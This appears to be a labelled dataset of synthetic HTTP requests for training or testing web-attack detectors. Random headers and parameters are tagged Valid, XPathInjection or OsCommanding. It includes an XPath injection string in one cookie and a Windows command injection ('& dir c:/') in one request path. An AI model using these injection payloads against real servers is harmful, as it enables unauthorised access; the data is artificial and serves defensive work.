Date: Mon, 23 Feb 09 23:16:55 GMT
ETag: W/"p7CAf6r7wPMNk_wm8l"
Expect: 100-continue
From: mnafich@nsbersImyu.fr
If-Modified-Since: Wed, 30 Nov 05 06:10:17 CET
If-Unmodified-Since: Tue, 15 Apr 08 20:22:29 GMT
If-Match: "NZM7mzN5LlA@8P@l37cD"
If-None-Match: "AueNQcPq.8s36rjkCA6g"
If-Range: Sat, 31 Oct 09 05:10:33 GMT
Max-Forwards: 0498
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: meaud m7h0u=nztdpF
Authorization: Digest algorithm=oyacjuie
Range: 14-,05-,-58
Referer: http://at3e.it/ptmthrI/FDEpt5.asp
TE: trailers,chunked,trailers
Trailer: If-Match
User-Agent: Mozilla/2.4 (Machintosh; U; Mac OS X 0.1; Lt-rr; rv:9.3.0) Gecko/19806678
UA-CPU: Sparc
UA-Disp: 754,5719,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3101x221
Via: FTP/8.7 21.237.63.133, iobq/3.5 www.weaiir.jpg
Transfer-Encoding: identity
Upgrade: spt/3.7, rs8xQ/8.1, ovEla/6.7, hsp/5.3, ecaol/5.8
Warning: 601 103.90.185.56:00009 "bInvy9od2reoewohbO" "Thu, 26 Mar 09 12:32:40 UTC"
X-Forwarded-For: 255.72.182.148
X-Serial-Number: 615013754882533
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29900
Start - Id: 17543
class: Valid
GET /e3.208X/eFHH8aSZ/wHIg-6YjSraVst/rP2F/7mVcbAvhtz6Nbt.asmx?GgvardocumentS=tmwindow.open8m&NtmbuGH8catr=%29%3Az&ee2ir=eeendsC&eo=1&oeodo=h%28frome&iuseaoceN=tsO HTTP/1.1
Host: 8.37.243.249
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 49.240.156.62
Cookie: otmNoareaah=12;bgAformK=6;F6ekihlrnjmaeoh=671346;iu1i=(;mcnhNnaaass8=292
Cookie2: $Version="2"
Date: Sun, 28 Oct 07 03:06:21 CET
ETag: "yVJB5ymB5@K_cDxHKK"
Expect: 100-continue
From: otDs@riqaOar1o.it
If-Modified-Since: Wed, 03 Feb 10 22:51:29 UTC
If-Unmodified-Since: Mon, 22 Dec 08 06:45:57 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Sep 08 06:59:51 CET
Max-Forwards: 283
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: y31i oT4idrMo=estc2ua
Authorization: ljaa qgnt=toaai
Range: -848823,71971-191917
Referer: /hoasym0o/oNre37u/olrr.sh
TE: trailers,gzip,deflate
Trailer: Authorization
User-Agent: E75nn/7.9.7.8.8
UA-CPU: StrongARM
UA-Disp: 586,910,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 845x6872
Via: 8.7 96.217.99.2, Yahhi/2.9 78.89.63.150, ndeteE/3.5 17.157.28.89
Transfer-Encoding: identity
Upgrade: qnef/6.1, teHndi/9.7, n5GAtw/8.0, Epe/2.3
Warning: 578 www.cuZgchp.tiff "esuto1wenhlasinfem" "Mon, 23 Mar 09 10:21:32 UTC"
X-Forwarded-For: 235.147.93.170
X-Serial-Number: 8998788877117234588
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17543
Start - Id: 6340
class: Valid
POST /ip/toipt8mey5oos.gif? HTTP/1.1
Content-Length: 39
Content-Language: n,hhbsh,dnN
Content-Encoding: gzip
Content-Location: /roibfea/cb2ott/dza9lSdo.tar
Content-MD5: bDJycnJpdWo4aWVzMG1nVA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 Jan 08 13:27:40 GMT
Last-Modified: Fri, 09 Feb 07 19:37:48 GMT
Host: www.irdona2.fr
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 211.106.108.116
Cookie: drirwSiethexsdi=cdvar?;tsusbper0vh=765834;daoaes=a;Yerht4=9359;rod=51504266
Cookie2: $Version="2"
Date: Fri, 08 Sep 06 24:27:01 UTC
ETag: W/"9UHlXsF@Iu6J5EC"
Expect: elmoz
From: zpatr@agAlejxt.net
If-Modified-Since: Wed, 19 Nov 08 24:57:12 GMT
If-Unmodified-Since: Fri, 16 Apr 10 23:27:32 UTC
If-Match: "551qdo6jFDa.tqdf"
If-None-Match: "uD82v2wydUg-dkiqdUP"
If-Range: Wed, 10 Mar 04 23:15:01 CET
Max-Forwards: 8
MIME-Version: 0.0
Pragma: pznp2e=ankd35
Proxy-Authorization: NTLM aHBob3RvbnRtaXRzY2VyZXJuYnRleXJ2blJyYXNtOWh0MWZ0N2Voc210YW9jYUUz
Authorization: Basic S3ByTHJ0OWg6ZWlxQg==
Range: 581-68555,-22163
Referer: http://e9ontM.ch/qnli/r9opsgRb/utmRebn/ltyfn.sh
TE: chunked,gzip;q=0.3
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.9 (X11; U; Linux i386 8.4; br-ct; rv:4.1.9) Gecko/78964449
UA-CPU: PowerPC
UA-Disp: 373,864,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 456x4910
Via: 9.6 www.ahvoeee.gif, 0.0 77.198.120.58, 4.1 www.4snot.jpg
Transfer-Encoding: compress
Upgrade: 5on/1.0, oeyolj/2.9, Ug1/7.6
Warning: 709 26.181.87.248 "we9uas" "Sat, 02 May 09 01:56:17 UTC"
X-Forwarded-For: 253.132.79.208
X-Serial-Number: 9387717978
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

tsjrdnasUonih=78&aeAbtekgs=rKr0yskKk06_

End - Id: 6340
Start - Id: 28665
class: Valid
GET /RI/E38iy7/ankOKqPd/aHKGlUy/RXZ3d/rlYmDrise6m24h1/nC/lQH54u_NBw5qfphoFS.msf?dnonSNRt9ze2O=y&MwH4=o%5D+rsete HTTP/1.1
Host: www.rheaej.org
Connection: close
Accept: video/quicktime
Accept-Charset: *;q=0.2
Accept-Encoding: gzip, compress, compress;q=0.3, identity, identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 23.27.72.219
Cookie: o7nh=askw|[abirmhs$b;Zeid8TLDi6e2=rRbDh2B6Wv;edAkointwO=s|nasDhr;r0ei=nH6ege3iofay
Cookie2: $Version="662"
Date: Fri, 10 Aug 07 09:55:54 UTC
ETag: "GIn6idfzBJze2mc"
Expect: 100-continue
From: 9rL2esue@fang.it
If-Modified-Since: Wed, 23 Dec 09 09:49:57 GMT
If-Unmodified-Since: Mon, 18 Apr 05 19:43:04 GMT
If-Match: "vcUz@Me.14_jC9TaS5b"
If-None-Match: "t4Kr3DUF.IlSypjrB5"
If-Range: Fri, 22 Jul 05 04:34:42 GMT
Max-Forwards: 091
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic YTV0YWFlOkJla2RpZW5o
Authorization: tenii tthrn5A=xnea
Range: -533
Referer: http://www.Rledi.ch/aRRIyj0n/fsu6lsns/5hroe/hieRatnr.tar.gz
TE: chunked,gzip;q=0.5
Trailer: Date
User-Agent: e-qXYKbOt http://www.btaec6e.com
UA-CPU: StrongARM
UA-Disp: 670,5224,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9872x6402
Via: FTP/1.9 www.aceeae1d.html
Transfer-Encoding: compress
Upgrade: tsSmni/9.1
Warning: 533 72.132.127.220 "beye" "Tue, 19 Sep 06 02:39:53 CET"
X-Forwarded-For: 147.116.71.106
X-Serial-Number: 6125410467694
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28665
Start - Id: 14980
class: Valid
GET /4o/eeCHZT9pYO5N/h1fiAgv/vbcZ5a5.shtml?zd-00710I=Io&eidrpw=nQshnan&mahaSdrndiy=615265&hdv=36&hl=8o8qwinntFarm4q%2Bl&XeLJZ@wZ=mfr0iyte&nee3fmracrTnle=7510746&bstsehomMi7o3l=Dayrel&snHirTyha=dimg+hm%27&tih6twsrsesno4=96810667&l85YZiY=998&xsqrs=tdio&cDmetaalll1v=aetcn6z+nso HTTP/1.1
Host: www.uSClmtaa.fr:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean, windows-1257;q=0.7, utf-7;q=0.5, iso-10646-ucs-2, windows-874;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 194.65.185.167
Cookie: Ei3eheam=121;YilsC=neu taGrmIpasswd%ori(;7zWIpw7q=zk@xa|ht
Cookie2: $Version="6"
Date: Sat, 13 Nov 04 16:51:42 UTC
ETag: W/"71JFW4MzbqhzQImwhpT"
Expect: 100-continue
From: mrepe@2e6fkf.net
If-Modified-Since: Sat, 19 Jun 04 01:27:08 UTC
If-Unmodified-Since: Wed, 05 Sep 07 06:13:50 UTC
If-Match: "iInmttVeJZ93u-N05-oC"
If-None-Match: *
If-Range: Fri, 10 Jun 05 03:21:33 CET
Max-Forwards: 9
MIME-Version: 3.1
Pragma: seeeiar='R1'
Proxy-Authorization: Basic N2VaaUxlb1I6b0liYTM4
Authorization: Digest cnonce="rnAhmoaa"
Range: 1538-,-4818
Referer: /e0ejl5/bins/ep8aiai/olvnoe/ralPaa.bin
TE: trailers,trailers,deflate
Trailer: Range
User-Agent: Jbemaudo1c
UA-CPU: PowerPC
UA-Disp: 803,2370,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 8957x255
Via: 4.9 www.leb5g.gif, 8.0 www.eayt.js:9926, FTP/4.4 221.247.13.89
Transfer-Encoding: eq9h
Upgrade: t1e/8.1, 4c6ehz/2.1, qtu/8.0
Warning: 058 66.139.140.245 "temrthaopc3v" "Tue, 05 Dec 06 10:50:29 GMT"
X-Forwarded-For: 217.55.216.75
X-Serial-Number: 158686381572781
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 14980
Start - Id: 6424
class: Valid
POST /cdtle4/sKWymV8uXqR/etnd/GYqyoAqtmpMsock_streamVPV3/divevalKEps4e4vxnc/aZcQAWJ@AAJz8HR/tlMKrCES/yhsup6aiow/aHkiP/7usNtels4ioentj/sz8/rplc.sh? HTTP/1.1
Content-Length: 89
Content-Language: eu,pl2nni,lNutSsrf
Content-Encoding: deflate
Content-Location: http://eehkRpIu.gov/oateemro/Umsctet/Pytae.swf
Content-MD5: ZG1pYW50ZWVuaHJmaWl2NQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 11 Dec 06 13:04:43 CET
Last-Modified: Thu, 11 Sep 08 19:13:24 GMT
Host: www.nocedyoi.it
Connection: keep-alive
Accept: video/mpeg;q=0.7, audio/x-wav;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: saosi-so9
Cache-Control: no-transform
Client-ip: 124.96.169.125
Cookie: swtelsTite=ehe6gvwontAEh;cbaaihagdteie=95396627;vservices797_nLxp_8G=slbt
Cookie2: $Version="208"
Date: Mon, 24 Nov 08 17:37:32 UTC
ETag: "IRsZTZ3VayBEvhF"
Expect: navl=esus;1b2ni=eqtheF
From: 5onfgr@tttceuz.gov
If-Modified-Since: Mon, 20 Mar 06 07:51:37 UTC
If-Unmodified-Since: Sat, 23 Jun 07 01:32:57 GMT
If-Match: "4po.SS_J8Hrkrh0E"
If-None-Match: ".WeQIepnKrt5Ofp9JA"
If-Range: Wed, 02 Jul 08 11:14:43 CET
Max-Forwards: 665
MIME-Version: 5.7
Pragma: oy='aIdx4fn'
Proxy-Authorization: NTLM Y0FkaGNkZWV1YzN2YWx0ZWp0cHNsR2xPYVlhQTY2c3dlcGhhblJ0Z2tzZ2lhY2E=
Authorization: Digest realm
Range: -187,296532-
Referer: http://www.ylM1met.org/ra4hann/nnrpJ/yoml/caq4Trdw.msf
TE: trailers,trailers
Trailer: Accept
User-Agent: ejlERc (8tHqeOwn; sVWX9v90h; a7_.UnBVW)
UA-CPU: x86
UA-Disp: 0332,310,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 572x754
Via: FTP/4.2 www.ilaec1ud.html, 2.3 www.1jtxd3.jpeg, 7.1 www.ss5inao.gif
Transfer-Encoding: compress
Upgrade: ifo1aO/5.4, vnieat/4.1, Aeaeh/9.0, rnai/4.9, baEnz/1.0
Warning: 834 www.myeibl.html "tfAmnsglsree" 
X-Forwarded-For: 3.49.116.125
X-Serial-Number: 45754151629
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

DlgikNorbyse=oTso5EXadtderl&esn=6:rtm&aipepthaotieee=stylete&fzoinepfoea=3648&r5ewu=702

End - Id: 6424
Start - Id: 23441
class: Valid
GET /8VyZ85qoFaSTqGGclv/i7Peteo/3exSaqivrzl7akm/aBoenr5/mARik/ARYo/aNmWjcpdC/mttec7eitaitegATYosp/8jITBrGHBn2YyCwFIE/a5MK.tiff? HTTP/1.0
Host: 60.246.208.133
Connection: mEkaom
Accept: */*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 116.67.243.172
Cookie: v5a9= O;otntu00wv=792;pedwtourepatauk=3792;ehlekiei=65;chdmut=r;xBeazb1wEwmeio=h8djCfyA0
Cookie2: $Version="4"
Date: Tue, 28 Aug 07 05:30:13 GMT
ETag: W/"aqOu1yoJkDVVl12BQsul"
Expect: 100-continue
From: tocfie@tta6.cz
If-Modified-Since: Tue, 10 Mar 09 09:06:36 GMT
If-Unmodified-Since: Sun, 26 Aug 07 03:26:17 GMT
If-Match: "qU88Bu.jn7aV.Om"
If-None-Match: "tdyOZ8sfLEjovP77yyf"
If-Range: Tue, 02 Jun 09 04:04:18 UTC
Max-Forwards: 4725
MIME-Version: 3.9
Pragma: eb='Opar'
Proxy-Authorization: Digest username="eru4bt"
Authorization: NTLM amJ0ZW90YW45c2VvOWdsZG9NZXRzbm84cDNhYXJvcmh4WXNpdDU=
Range: 47922-,-4850
Referer: /himdnpe0/0aiBtt.ace
TE: chunked
Trailer: Range
User-Agent: Mozilla/8.0 (Windows; U; WinNT 4.5; Ji-th; rv:2.9.1) Gecko/42986599
UA-CPU: StrongARM
UA-Disp: 2035,3360,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8587x9946
Via: HTTP/6.9 199.197.115.69, FTP/1.0 www.2eesd6i.css:745
Transfer-Encoding: gzip
Upgrade: ewen/9.0, yzsq/2.6, dee/3.9
Warning: 271 www.yytteo.gif "tthisNt" 
X-Forwarded-For: 46.39.164.236
X-Serial-Number: 15233843
----: ------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 23441
Start - Id: 48448
class: XPathInjection
GET /ee6e/4hQk_-/ehdd2zea/oTfayhtOhE7b5s6nnShe/zIJL2/nYL8eoe4/r3479Zoy.3Tcf5/eee0eiieaeje.tiff?yTrasbl41f=Rs7nAjawhltnnEgtiw&tegl=dkz&trtN8b=1659841 HTTP/1.1
Host: www.NeidLnhpw2.st
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic;q=0.7, ks_c_5601-1987, iso-8859-4, x-mac-icelandic;q=0.4
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 59.195.168.32
Cookie: Xe_@F=he'  or  haTzee/irMit/child::node()[processing-instruction()=858]     or    'et' =   ';btnN=N9oht?=eI%i38d zh[1;diu0ywo=95icmdzsDq>kozfcopytelnet
Cookie2: $Version="425"
Date: Tue, 21 Mar 06 01:34:50 GMT
ETag: "wD11v2K1vjaq.FUAN.l"
Expect: oudsmh=otns;3aro=ttbQee
From: Lulrt@wdvuoa.de
If-Modified-Since: Wed, 21 Feb 07 19:53:45 GMT
If-Unmodified-Since: Mon, 08 Oct 07 24:11:18 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 28 Mar 09 18:55:19 CET
Max-Forwards: 3
MIME-Version: 2.9
Pragma: lhHohte=mlsdfdgt
Proxy-Authorization: Tcdn 7efalmwm=stoxcSra
Authorization: Digest username="rspaecf"
Range: 2-,035919-,808526-
Referer: http://gtei.uk/ofsH6ynk/oszst/eamnuacw/t2ysaat/ag0ppd1.wav
TE: chunked;q=0.3,deflate;q=0.0,deflate;q=0.1
Trailer: Pragma
User-Agent: vb1aesidtoo
UA-Disp: 5360,872,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 348x583
Via: 8.5 61.142.72.91:0195
Transfer-Encoding: identity
Upgrade: rtyfAi/5.9
Warning: 787 www.nspetr.htm "homtzfS" 
X-Forwarded-For: 152.33.64.46
X-Serial-Number: 30614
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48448
Start - Id: 14978
class: Valid
GET /obv-2UBdyvHJ/thetStseghtr/ha/aeoIyDqorseu7vn/qYy3k3Wf1lWgu/oilabtWiectnen/larNat2aFTirVs/6ATj4fkopenKCV/e2dscalUctrN0sh1/hrre73SmreL2doigIapt/b8gPz_tZ9-70P_-nDC5y.shtml?r0s=0434469&tfl=etofusgvbscript%3D&umchsj7toAuEd=%5DreKet+taeew&a0ehivaryiimu4=zFEdkkq&okEonio5=F&eyqao4BSo3b91=e&bvah7aAd=ni%7Ca+robetween9acopy%25u&rnntsal=etelnetd&hoO=glE58Wovsy&RurePeeawosisva=niWs7bxN_MR&KZnDQmiNR=03&lhdhriatyaalgm=fmkzhag3iog&Abinijcfhk8rcp=J%3A&zsTa=s+t+include&eeneoinNmosO4eE=oshutdownTspeae HTTP/1.1
Host: www.t96nooedHe.de
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-kr
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=681
Client-ip: 194.65.185.167
Cookie: Ei3eheam=121;YilsC=neu taGrmIpasswd%ori(;7zWIpw7q=zk@xa|ht
Cookie2: $Version="57"
Date: Tue, 20 Dec 05 21:35:55 CET
ETag: W/"71JFW4MzbqhzQImwhpT"
Expect: 100-continue
From: mrepe@2e6fkf.net
If-Modified-Since: Sat, 19 Jun 04 01:27:08 UTC
If-Unmodified-Since: Wed, 05 Sep 07 06:13:50 UTC
If-Match: "HuJDfiRaJCWZZBY_"
If-None-Match: *
If-Range: Fri, 10 Jun 05 03:21:33 CET
Max-Forwards: 480
MIME-Version: 3.1
Pragma: hoa='e'
Proxy-Authorization: NTLM ZWNzUm9TVHNSaGZlNXJvdGxrQ2Vlb3o2ZDV5ZWlyZElpeTRhMA==
Authorization: Digest cnonce="rnAhmoaa"
Range: 1538-,-4818
Referer: /rdydhucR.cgi
TE: trailers,trailers,deflate
Trailer: Range
User-Agent: Mozilla/1.3 (X11; U; Open BSD i586 1.2; U6-sr; rv:1.6.8) Gecko/24400107
UA-CPU: PowerPC
UA-Disp: 803,2370,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3303x2790
Via: loq/2.3 www.e1tm.tiff
Transfer-Encoding: eq9h
Upgrade: t1e/8.1, 4c6ehz/2.1, qtu/8.0
Warning: 058 66.139.140.245 "temrthaopc3v" "Tue, 05 Dec 06 10:50:29 GMT"
X-Forwarded-For: 217.55.216.75
X-Serial-Number: 158686381572781
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 14978
Start - Id: 43873
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.1
Host: www.aa3p.org:80
Connection: keep-alive
Accept: */*
Accept-Charset: euc-tw, x-mac-hebrew;q=0.8, windows-1251, iso-2022-kr;q=0.7, iso-8859-7
Accept-Encoding: deflate;q=0.4, deflate;q=0.7
Accept-Language: *;q=0.1
Cache-Control: max-age=63
Client-ip: 132.134.82.134
Cookie: fihMateayhssdt=939
Cookie2: $Version="4"
Date: Mon, 30 Jul 07 05:27:31 GMT
ETag: "4p2ZiLBnvJxcMOdpmaxa"
Expect: aael=eeIlcr
From: nxa0tn0@Cododus.net
If-Modified-Since: Mon, 16 Jan 06 22:22:18 GMT
If-Unmodified-Since: Sun, 25 Sep 05 05:41:40 GMT
If-Match: "t-nu44CIJ9zpgSAjN0t"
If-None-Match: "o80Br3oYw_Toit0ij@"
If-Range: Sun, 07 Aug 05 24:59:34 CET
Max-Forwards: 8567
MIME-Version: 1.9
Pragma: fAttmFml='s4a'
Proxy-Authorization: Digest uri=/uiers/ieatYM/iCiR.tiff
Authorization: lSOune xeikcnEt=6xsrh
Range: 17-,-8
Referer: /Np6sec/ocysq/yrer.gif
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/0.8 (X11; U; Open BSD i586 6.9; 4b-dp; rv:3.3.3) Gecko/11592725
UA-CPU: Sparc
UA-Disp: 7852,060,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: FTP/1.6 238.1.243.165, 9.9 185.157.151.121
Transfer-Encoding: 1qsm; vrjcoda9=adoeErc7
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 631 234.108.10.201:870 "l05cl4bnf" "Sat, 24 Jan 04 23:46:55 UTC"
X-Forwarded-For: 160.49.9.9
X-Serial-Number: 3781444141
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43873
Start - Id: 31530
class: Valid
GET /dkr9jnpcC-/_EA5VQJ/cnoianae1qt7tnEyyb/ehlautoexecZxe_ab/v./enbheel5dtdmo4aaaEpe/gwEYFHy4q.jpg?ley9el=n%3Cloda&on=src%26mochalikecopyoxc5osbrw&requeaela=%3Ei5asal&mtro=oFZ-D4&FjQYnc-S.l=texec+4A7%7E%29ux9et&e2=u%2B&tatRjSweb=64&XGqP6bVzI=0944990300&eWrbfahr=a1dk HTTP/1.1
Host: www.daahniA3HB.gov:07
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: n39abK=outc
Client-ip: 223.96.61.66
Cookie: negn=etegnmMreeaf9n;nraaoh=a\eolog;AcffmoRwwtpg=S0Masqaeit ikoe;ee=i0aspv;5qz@yW=rhH8Lu
Cookie2: $Version="2"
Date: Sat, 03 Mar 07 06:06:41 UTC
ETag: "1OPgRCT_WsRtsYTzTr"
Expect: 7nsmn=roto;unao9=oneyihii
From: 028yme@usxuslalti.it
If-Modified-Since: Mon, 19 Apr 10 08:09:46 GMT
If-Unmodified-Since: Mon, 23 Jan 06 02:31:04 UTC
If-Match: "25TCOUitlLL.-kyt5r"
If-None-Match: *
If-Range: "Dm89PbnMsX_K9k24"
Max-Forwards: 5677
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest response="CeDbC8D96EAb8Ba9CA0d907FB9AdaaBb"
Range: -89812,-061835,42050-159934
Referer: http://www.Us7l3.biz/xo34u/anoHit/inawfrn/EeNie/emalir.gz
TE: gzip;q=0.5
Trailer: If-Match
User-Agent: Mozilla/4.9 (compatible; sieIriee; Windows NT; aeet6f0f)
UA-CPU: 68000
UA-Disp: 5662,024,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 362x515
Via: 0.7 www.e1nzsz.tiff, FTP/3.9 www.nPeTa2c.shtml, 9.4 222.33.181.222
Transfer-Encoding: iWne; l2ise=n00D
Upgrade: Csis5m/6.9, opoe/5.3, nade/2.1, dtOer/1.5, et7ss/5.5
Warning: 260 www.bzamkGai.png "amaoc5shgasuctu" "Thu, 16 Mar 06 13:14:03 CET"
X-Forwarded-For: 81.227.175.207
X-Serial-Number: 5515370509152
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31530
Start - Id: 9725
class: Valid
GET /m6ipoJ/elt/Xwf2sK0HYmN5V.css? HTTP/1.1
Host: 98.177.184.54
Connection: keep-alive
Accept: */*
Accept-Charset: koi8;q=0.8, koi8-r, koi8;q=0.7, iso-8859-5, x-mac-arabic;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 23.225.133.49
Cookie: dhemdrhlmeuioe=onP39R;47me9tgvon8paAw=6DBqL;e6dorn=) a;uuC1V2uE2=55729806;ynm=)g5
Cookie2: $Version="02"
Date: Tue, 11 Mar 08 12:47:34 GMT
ETag: "s0zqRptK6ayGgPf71"
Expect: rc4I3=nnta
From: a5e2p@0aodla.de
If-Modified-Since: Thu, 01 Feb 07 06:33:57 UTC
If-Unmodified-Since: Sat, 08 Jan 05 13:16:51 UTC
If-Match: *
If-None-Match: "UpFQ0VSOeSn7.geZ.X"
If-Range: "b.y934aBR7qb5_nGF95"
Max-Forwards: 3
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest nc=aCF05B7C
Authorization: tanpT2 txgadh=me6n6r
Range: 56419-6047,31908-,-5753
Referer: /gpfrtwt/ehfXwe/1Ehtewea/hKYanNuc/9H3e.mdb
TE: gzip;q=0.2,trailers,trailers
Trailer: Accept-Language
User-Agent: si6mstm/1.3.6.0.3
UA-CPU: StrongARM
UA-Disp: 5705,3975,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6817x021
Via: FTP/1.9 180.130.77.60
Transfer-Encoding: compress
Upgrade: e3d/8.2
Warning: 162 www.odini6n.jpg "npswobidL" "Mon, 27 Aug 07 18:43:51 UTC"
X-Forwarded-For: 156.177.170.9
X-Serial-Number: 66630290652
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9725
Start - Id: 28645
class: Valid
GET /ss/s9/1o478lm/etP0g2AvxdE.7YI0_e/aYPkyq.YrM2DkIUV/uwbdalArWMM1HH/bHw8UeVp6LBPe.swf?tfjaeig7hrhase=essr&cteiduui6=E1nhou%7EldcaSn&matj=tHZ&kr.gnodeg_n=eto&kituk3e=036082&4P71=5&tchfentdi=2admin%28vt&iwokSeosseeh=2981941 HTTP/1.1
Host: www.abev.gov:80
Connection: rea1K6no
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 49.18.142.23
Cookie: e5oe84D=arsseciqiht;Ceshutdown25zcl=erslo%n4ewin ;tstdinhT0A8POyGQ=2mli
Cookie2: $Version="92"
Date: Mon, 09 Jun 08 10:52:51 UTC
ETag: W/"HIDL-RCXV0oJA2OTDWZ"
Expect: rmwi3a
From: 6EaEszit@irni.st
If-Modified-Since: Sat, 21 Feb 04 10:31:34 CET
If-Unmodified-Since: Wed, 24 Nov 04 21:59:38 CET
If-Match: "7ulnQ_2W6.ox.q3.46e"
If-None-Match: "TaqgtBmlLUd87pTqeci"
If-Range: Sat, 29 Sep 07 05:52:02 UTC
Max-Forwards: 1644
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic cnRtYjppTW9naDVz
Authorization: Digest nc=dddF91b2
Range: -5208,9131-01794,317-32381
Referer: /ppourseo/osnae/tnuhdMe/rearar3.mdb
TE: trailers,deflate;q=0.7
Trailer: Date
User-Agent: Mozilla/1.4 (Windows; U; Win 9x 9.2; Me-bi; rv:8.3.5) Gecko/91646792
UA-CPU: 68000
UA-Disp: 8045,183,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9872x6402
Via: 5.9 252.244.140.100, 8.2 230.20.238.56
Transfer-Encoding: identity
Upgrade: itsea5/7.2, eiy9n/5.3
Warning: 549 www.qedA.js:86726 "lwa91t2l1" 
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 6125410467694
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28645
Start - Id: 28117
class: Valid
GET /nqaAB-WKTdi./bm99moR.vAL3.mdb?wlntfdoitiFeg=5tmpaa%7E&ndhersihpetckid=640325&ih80jsi21eeE=cxpaayin&mHMDQdivuf=f&neeogseYhcb=f6 HTTP/1.0
Host: 37.241.18.165
Connection: lsov
Accept: image/*;q=0.5
Accept-Charset: euc-jp, iso-8859-3, utf-8
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=56093
Client-ip: 219.78.190.9
Cookie: hsr=2650680;acmstyle6XLDTo=88800762
Cookie2: $Version="0"
Date: Sat, 07 Nov 09 10:11:54 CET
ETag: W/"iHQda_C-FUBqOY_S"
Expect: 100-continue
From: pnlav3j@ifnra.biz
If-Modified-Since: Mon, 29 May 06 08:44:13 CET
If-Unmodified-Since: Sat, 26 Feb 05 09:27:08 CET
If-Match: "M67RJ5MUpyL2vOujA5"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Basic ZWV5ZW5kOlJIdGRlZWU=
Authorization: NTLM OWlwcmhybnczb25ORmlza25veXJwdHRiRGV5M3IwdHJvbzJoc2RpdHV0dA==
Range: 0-
Referer: http://Jr7X2mna.com/h7geeic.wmn
TE: chunked;q=0.8,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.8 (X11; U; Unix 7.9; ka-n3; rv:0.2.2) Gecko/41506390
UA-CPU: Sparc
UA-Disp: 166,4722,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4261x691
Via: 8.4 www.0atA.gif, scte9/7.7 www.iitneao.gif:6104, 1.1 40.25.149.58:208
Transfer-Encoding: iwgeoi
Upgrade: laa/1.4
Warning: 810 www.cq0i.htm "twdSte9atJriluetrna" 
X-Forwarded-For: 184.51.223.21
X-Serial-Number: 3455337535861229
----: ----------------------------------
